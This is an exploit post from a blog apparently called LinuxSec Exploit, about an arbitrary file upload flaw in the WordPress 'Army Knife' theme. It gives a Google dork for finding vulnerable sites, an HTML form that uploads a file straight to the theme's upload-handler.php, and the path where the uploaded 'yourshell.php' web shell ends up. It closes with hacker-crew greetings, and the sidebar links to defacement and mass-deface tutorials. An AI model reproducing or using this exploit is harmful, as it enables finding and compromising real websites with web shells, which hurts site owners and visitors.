• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

WordPress Army Knife CSRF File Upload Vulnerability

November 9, 2013 by Jack Wilder Leave a Comment

Exploit Title: WordPress Army Knife CSRF File Upload Vulnerability
Author: Bebyyers404
Date: 11/09/2013
Vendor Homepage: http://freelancewp.co

Themes Link: http://freelancewp.com/wordpress-theme/army-knife/
Infected File: upload-handler.php
Category: webapps/php
Google dork: inurl:/wp-content/themes/armyknife
Tested on : Windows/Linux

Exploit & POC :

<form enctype="multipart/form-data"
action="http://127.0.0.1/wordpress/wp-content/themes/armyknife/functions/upload-handler.php" method="post">
Please choose a file: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

File path:
http://127.0.0.1/wordpress/wp-content/uploads/[year]/[month]/yourshell.php

./Nabilaholic404, ./Bebyyers404, ./Panda Dot ID, ./Tsunaomi48, ./Pscript ./Mbah-Rowo

JKT48 CYBER TEAM & Black Devils Crew

Shares

Filed Under: WordPress Exploit Tagged With: Exploit

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Laravel PHPUnit Remote Code Execution

Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

Exploit WordPress Ajax Load More PHP Upload Vulnerability

Exploit WPStore Themes Upload Vulnerability

Deteksi Celah No Redirect pada Suatu Situs menggunakan cURL

bWAPP Remote File Inclusion Medium Security Level

Tutorial Deface – Menutup Halaman Depan Situs Target dengan JS Overlay

Azure Traffic Manager Custom Domain or Subdomain Takeover

Mass Deface setelah Rooting Server

WordPress Plugin CopySafe PDF Protection Shell Upload

LinuxSec / 65 queries in 0.10 seconds